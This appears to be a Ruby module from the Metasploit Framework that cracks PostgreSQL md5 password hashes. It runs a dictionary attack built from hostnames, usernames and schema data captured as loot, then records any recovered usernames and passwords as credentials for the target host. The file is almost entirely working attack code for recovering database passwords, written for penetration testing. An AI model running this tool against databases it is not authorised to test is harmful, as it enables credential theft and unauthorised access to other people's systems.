metasploit-framework/modules/auxiliary/analyze/postgres_md5_crack.rb

86 lines
2.1 KiB
Ruby

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
#
##
require 'msf/core'
require 'digest/md5'
class Metasploit3 < Msf::Auxiliary
#Included to grab the john.pot and use some utiltiy functions
include Msf::Auxiliary::JohnTheRipper
def initialize
super(
'Name' => 'Postgres SQL md5 Password Cracker',
'Description' => %Q{
This module attempts to crack Postgres SQL md5 password hashes.
It creates hashes based on information saved in the MSF Database
such as hostnames, usernames, passwords, and database schema information.
The user can also supply an additional external wordlist if they wish.
},
'Author' => ['theLightCosine'],
'License' => MSF_LICENSE
)
deregister_options('JOHN_BASE','JOHN_PATH')
end
def run
print_status("Processing wordlist...")
@seed= build_seed()
print_status("Wordlist length: #{@seed.length}")
myloots = myworkspace.loots.where('ltype=?', 'postgres.hashes')
unless myloots.nil?
myloots.each do |myloot|
begin
postgres_array = CSV.read(myloot.path).drop(1)
rescue
print_error("Unable to process #{myloot.path}")
end
postgres_array.each do |row|
print_status("Attempting to crack hash: #{row[0]}:#{row[1]}")
password = crack_hash(row[0],row[1])
if password
print_good("Username: #{row[0]} Pass: #{password}")
report_auth_info(
:host => myloot.host.address,
:port => myloot.service.port,
:sname => 'postgres',
:user => row[0],
:pass => password
)
end
end
end
end
end
def crack_hash(username,hash)
@seed.each do |word|
tmphash = Digest::MD5.hexdigest("#{word}#{username}")
if tmphash == hash
return word
end
end
return nil
end
end